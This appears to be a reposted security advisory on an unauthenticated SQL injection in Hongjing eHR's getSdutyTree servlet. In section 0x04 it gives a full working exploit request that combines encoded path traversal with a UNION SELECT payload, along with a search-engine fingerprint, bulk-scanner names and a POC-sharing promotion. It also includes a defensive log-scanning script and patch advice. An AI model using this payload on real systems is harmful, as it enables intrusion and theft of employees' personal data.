0x01 Product Introduction
Hongjing eHR is human resource management software that integrates HR management with digital applications to meet dynamic, collaborative, process-oriented strategic needs.
0x02 Vulnerability Overview
The /servlet/sduty/getSdutyTree interface of Hongjing eHR contains a SQL injection vulnerability. An unauthenticated remote attacker can use the injection to obtain passwords, users' personal information and other data, and can also read information in the database (administrator back end). In addition, given sufficiently high database privileges, the attacker can write a trojan (webshell) to the server to gain further control over the server's operating system.
0x03 Search Engine Fingerprint
app='HJSOFT-HCM'
0x04 Vulnerability Reproduction
GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120% 29%2BCHAR%28106%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28106%29%2BCHAR%28119%29%2BCHAR%2885%29%2BCHAR%2873%29%2BCHAR%2887%29% 2BCHAR%2899%29%2BCHAR%2875%29%2BCHAR%28116%29%2BCHAR%2872%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%28107%29%2BCHAR%2889%29%2BCHAR% 28115%29%2BCHAR%28108%29%2BCHAR%2873%29%2BCHAR%2884%29%2BCHAR%2869%29%2BCHAR%2873%29%2BCHAR%2875%29%2BCHAR%2883%29%2BCHAR%2898% 29%2BCHAR%28116%29%2BCHAR%28120%29%2BCHAR%2889%29%2BCHAR%2884%29%2BCHAR%2882%29%2BCHAR%28120%29%2BCHAR%2884%29%2BCHAR%28116%29% 2BCHAR%2888%29%2BCHAR%28112%29%2BCHAR%2887%29%2BCHAR%2873%29%2BCHAR%28109%29%2BCHAR%28104%29%2BCHAR%2887%29%2BCHAR%28102%29%2BCHAR% 2897%29%2BCHAR%2877%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28122%29%2BCHAR%28113%29%2CNULL%2CNULL–+Iprd HTTP/1.1
Host: <your IP>
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Verify with sqlmap
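For defenders who cannot patch immediately, the request above has two distinguishing traits worth alerting on: the URL-encoded `%2e./.%2e` traversal that reaches the servlet through the /w_selfservice/oauthservlet/ path, and a UNION SELECT / CHAR() payload in the query string. The following Python script is an added example (not part of the original write-up) that decodes each request target from web-server access logs and flags those traits; the log lines and the detection rules are constructed here and are assumptions, not vendor-supplied signatures.

```python
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample access-log lines (hypothetical, not from a real server).
SAMPLE_LOG = """\
10.0.0.5 - - [01/May/2024:10:00:01 +0800] "GET /w_selfservice/oauthservlet/%2e./.%2e/servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1%27+UNION+ALL+SELECT+NULL%2CCHAR%28113%29%2BCHAR%28120%29%2CNULL--+abcd HTTP/1.1" 200 512
10.0.0.6 - - [01/May/2024:10:00:02 +0800] "GET /servlet/sduty/getSdutyTree?param=childtarget=1codesetid=1codeitemid=1 HTTP/1.1" 200 1024
10.0.0.7 - - [01/May/2024:10:00:03 +0800] "GET /w_selfservice/oauthservlet/login HTTP/1.1" 200 300
"""

# Extract method and request target from a combined-format log line.
REQ_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d"')
# Heuristic rule (assumption): UNION ... SELECT or CHAR( in the query string.
SQLI_RE = re.compile(r"\bUNION\b.*\bSELECT\b|\bCHAR\s*\(", re.IGNORECASE)
# A decoded path segment that is exactly ".." indicates traversal.
TRAVERSAL_RE = re.compile(r"(?:^|/)\.\.(?:/|$)")
ENDPOINT = "/servlet/sduty/getsdutytree"


def analyze_request(target: str) -> list:
    """Return the list of findings for one request target (empty if benign)."""
    # Double-decode so %252e-style encodings are normalised as well;
    # unquote_plus turns '+' in the query into spaces first.
    decoded = unquote(unquote_plus(target))
    path, _, query = decoded.partition("?")
    findings = []
    # Traversal is only interesting here if it ends up at the vulnerable servlet.
    if ENDPOINT in path.lower() and TRAVERSAL_RE.search(path):
        findings.append("path_traversal")
    if SQLI_RE.search(query):
        findings.append("union_select")
    return findings


def scan_log(log_text: str) -> list:
    """Return (client_ip, findings) for every suspicious line in the log."""
    hits = []
    for line in log_text.splitlines():
        m = REQ_RE.search(line)
        if not m:
            continue
        findings = analyze_request(m.group("target"))
        if findings:
            hits.append((line.split(" ", 1)[0], findings))
    return hits


if __name__ == "__main__":
    for ip, findings in scan_log(SAMPLE_LOG):
        print(f"{ip}: {', '.join(findings)}")
```

Only the first sample line is reported; a normal call to the servlet without traversal or injection syntax, and other traffic under the OAuth path, pass silently.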
0x05 Bulk Scanning Tools
nuclei
afrog
xray
Getting the POC script
Scan with WeChat (VX) and join our internal POC script sharing circle.
0x06 Remediation Advice
The vendor has released a security update; affected users can contact the manufacturer to obtain the patch.
# [Vulnerability Reproduction] The above content on the Hongjing eHR sduty/getSdutyTree SQL injection vulnerability is excerpted from the internet and is for reference only. See the official announcement for authoritative information.
Original article, author: CSDN. If reposting, please credit the source: https://www.sudun.com/ask/93242.html